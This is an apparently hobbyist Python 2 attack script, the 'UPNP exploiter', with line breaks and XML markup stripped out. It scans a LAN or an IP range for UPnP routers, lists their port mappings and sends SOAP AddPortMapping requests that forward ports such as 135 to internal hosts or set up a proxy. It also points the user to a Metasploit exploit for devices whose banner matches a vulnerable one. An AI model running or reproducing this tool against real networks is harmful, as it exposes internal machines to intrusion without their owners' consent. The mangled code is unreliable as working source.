#!/bin/python import urllib2, re, sys, select, socket ### # Some static info ## tport = 49170; upnport = 1900; msg = "M-SEARCH * HTTP/1.1\r\nHOST:\r\nST: ssdp:all\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\n\r\n"; ### # Used to ping one target. ### def target(): data = [] try: tar = sys.argv[2]; if sys.argv[2].find("*") != -1: star = sys.argv[2].split(".*"); i = 1; while i < 255: tar = star[0]+"."+str(i) print "Sending UPNP packets to "+tar; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.bind(("", tport)); s.sendto(msg, (tar, upnport)); i += 1; else: print "Sending UPNP packets to "+tar; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.bind(("", tport)); s.sendto(msg, (tar, upnport)); print "Waiting for data"; print "Press Ctrl+c at anytime to stop capture"; while True: string, addr = s.recvfrom(1024); data.append([addr[0], string]); print "Got some data"; except KeyboardInterrupt: s.close(); proc(data); ### # Used to ping lan ### def lan(): #data = ""; data = []; try: print "Sending broadcast UPNP packets to lan"; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.bind(("", tport)); s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1); s.sendto(msg, ("", 1900)); print "Waiting for data"; print "Press Ctrl+c at anytime to stop capture"; while True: res = select.select([s],[],[]); string, addr = res[0][0].recvfrom(1024); #data += string; data.append([addr[0], string]); print "Got some data"; except KeyboardInterrupt: s.close(); proc(data); ### # open ports on routers ### def sploit(host): #print host; #exit(1); print "LOL you are evil"; rhost = re.findall("([^/]+)", host); print "Well here goes nothing..."; print "Trying to get some info from the target..."; try: res = urllib2.urlopen(host).read(); res = res.replace("\r", ""); res = res.replace("\n", ""); res = res.replace("\t", ""); pres = res.split("urn:upnp-org:serviceId:WANIPConn1"); p2res = pres[1].split(""); p3res = p2res[0].split(""); ctrl = p3res[1]; rip = res.split(""); rip1 = rip[1].split(""); routerIP = rip1[0]; print "Router internal IP: "+routerIP; print "Ports already open:"; print "INT:EXT:ADDR:Desc"; i=1; try: while True: opmsg = ''+str(i)+''; open_ports = urllib2.Request("http://"+rhost[1]+""+ctrl, opmsg); open_ports.add_header("SOAPACTION", '"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry"'); open_ports.add_header('Content-type', 'application/xml'); open_res = urllib2.urlopen(open_ports).read(); int1 = open_res.split(''); int2 = int1[1].split(''); intport = int2[0]; ext1 = open_res.split(''); ext2 = ext1[1].split(''); extport = ext2[0]; addr = open_res.split(''); addr1 = addr[1].split(''); address = addr1[0]; des = open_res.split(''); des1 = des[1].split(''); desc = des1[0]; print intport+":"+extport+":"+address+":"+desc i=i+1; except Exception, e: err="" except Exception, e: #print e; print "Failed to get anything from the target :/" IP = raw_input("IP of internal host to forward posts to: [] "); if IP == "": IP = ""; port = raw_input("Port of internal host you want to forward to the net: [135] "); if port == "": port = "135"; extport = raw_input("External port: [135] "); if extport == "": extport = "135"; msg = ''+extport+'TCP'+port+''+IP+'1hax0r0'; try: req = urllib2.Request("http://"+rhost[1]+""+ctrl, msg); req.add_header('SOAPAction', '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"'); req.add_header('Content-type', 'application/xml'); res = urllib2.urlopen(req); print "HOLY SHIT IT WORKED!!!"; except Exception, e: print e; print "Shit it didnt work y0 :/"; ### # here we try to set up a proxy ### def proxy(host): try: print "LOL you are evil"; rhost = re.findall("([^/]+)", host); print "Well here goes nothing..."; res = urllib2.urlopen(host).read(); res = res.replace("\r", ""); res = res.replace("\n", ""); res = res.replace("\t", ""); pres = res.split("urn:upnp-org:serviceId:WANIPConn1"); p2res = pres[1].split(""); p3res = p2res[0].split(""); ctrl = p3res[1]; IP = raw_input("IP the proxy connects to: [] "); if IP == "": IP = ""; extport = raw_input("External port: [8080] "); if extport == "": extport = "8080"; msg = ''+extport+'TCP80'+IP+'1hax0r0'; req = urllib2.Request("http://"+rhost[1]+""+ctrl, msg); req.add_header('SOAPAction', '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"'); req.add_header('Content-type', 'application/xml'); try: res = urllib2.urlopen(req); print "HOLY SHIT IT WORKED!!!"; except Exception, e: print e; print "Shit it didnt work y0 :/"; except Exception, e: print e; ### # here we pick our attack ### def choose(host): print "1) Open ports."; print "2) Open proxy."; meth = raw_input("Which attack you wanna do?: [1] "); if meth == "1": sploit(host); if meth == "2": proxy(host); if meth == "": sploit(host); ### # Proccess data from lan or target ### def proc(data): if len(data) == 0: done(""); print "\r\nWorking with the data we got..."; pdata = dict((x[0], x) for x in data).values() rh = []; for L in pdata: rh.append(L[0]); hosts = []; pd = []; print "Making a few connections..."; for host in rh: try: spot = rh.index(host); hdata = pdata[spot][1]; url = "http://"+host+":"; port = re.findall("http:\/\/[0-9\.]+:(\d.+)", hdata); url += port[0]; p = urllib2.urlopen(url, timeout=3); rd = re.findall("schemas-upnp-org:device:([^:]+)", p.read()); if rd[0] == "InternetGatewayDevice": addr = re.findall("http://([^:]+)", url); vuln = "Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1"; if hdata.find(vuln) != -1: d = raw_input(addr[0]+" might be open to the unique_service_name() exploit, open msf and give it a go. For more information goto this URL - http://www.osvdb.org/show/osvdb/89611 Press enter to continue."); #yesnosploit = raw_input(addr[0]+" is a router, do you want to try to open ports? (Y)es/(N)o: "); yesnosploit = raw_input(addr[0]+" is a router/modem, do you want to try to exploit is?: (Y)es/(n)o "); if yesnosploit.lower() == "y": choose(url); if yesnosploit == "": choose(url); pd.append([url, rd[0]]); except: err = ""; pd.append([url, "Could not connect..."]); done(pd); ### # This func displays info we got ### def done(data): if len(data) == 0: print "\r\nNo UPNP supported devices found :("; ### # Welcome msg ### print ""; print "##########################"; print "# UPNP exploiter #"; print "# By: Anarchy Angel #"; print "# www.dc414.org #"; print "# Happy hacking :) #"; print "##########################"; exit(1); for info in data: # if sys.argv[1] == "target": # port = re.findall("([^:]+)", info[0]); # path = re.findall("([^/]+)", info[0]); # print "Device UPNP info page: http://"+sys.argv[2]+":"+port[2]; # else: # print "Device UPNP info page: "+info[0]; print "Device UPNP info page: "+info[0]; print "Device type: "+info[1]+"\r\n"; print "Done!"; print ""; ### # Welcome msg ### print "##########################"; print "# UPNP exploiter #"; print "# By: Anarchy Angel #"; print "# www.dc414.org #"; print "# Happy hacking :) #"; print "##########################"; exit(1); ### # display usage ### def usage(): ### # Welcome msg ### print "##########################"; print "# UPNP exploiter #"; print "# By: Anarchy Angel #"; print "# www.dc414.org #"; print "# Happy hacking :) #"; print "##########################"; print ""; print "upnp.py type ip"; print "Types: lan/target"; print "IP is only needed is using type target"; print "scan ip range using *"; print "i.e: python upnp.py target 123.456.789.*"; print "Many thanks to Ngharo for all his help making this script"; exit(1); ### # parse argv and direct to right func ### if len(sys.argv) == 1: usage(); elif sys.argv[1] == "lan": lan(); elif sys.argv[1] == "target": target(); else: usage();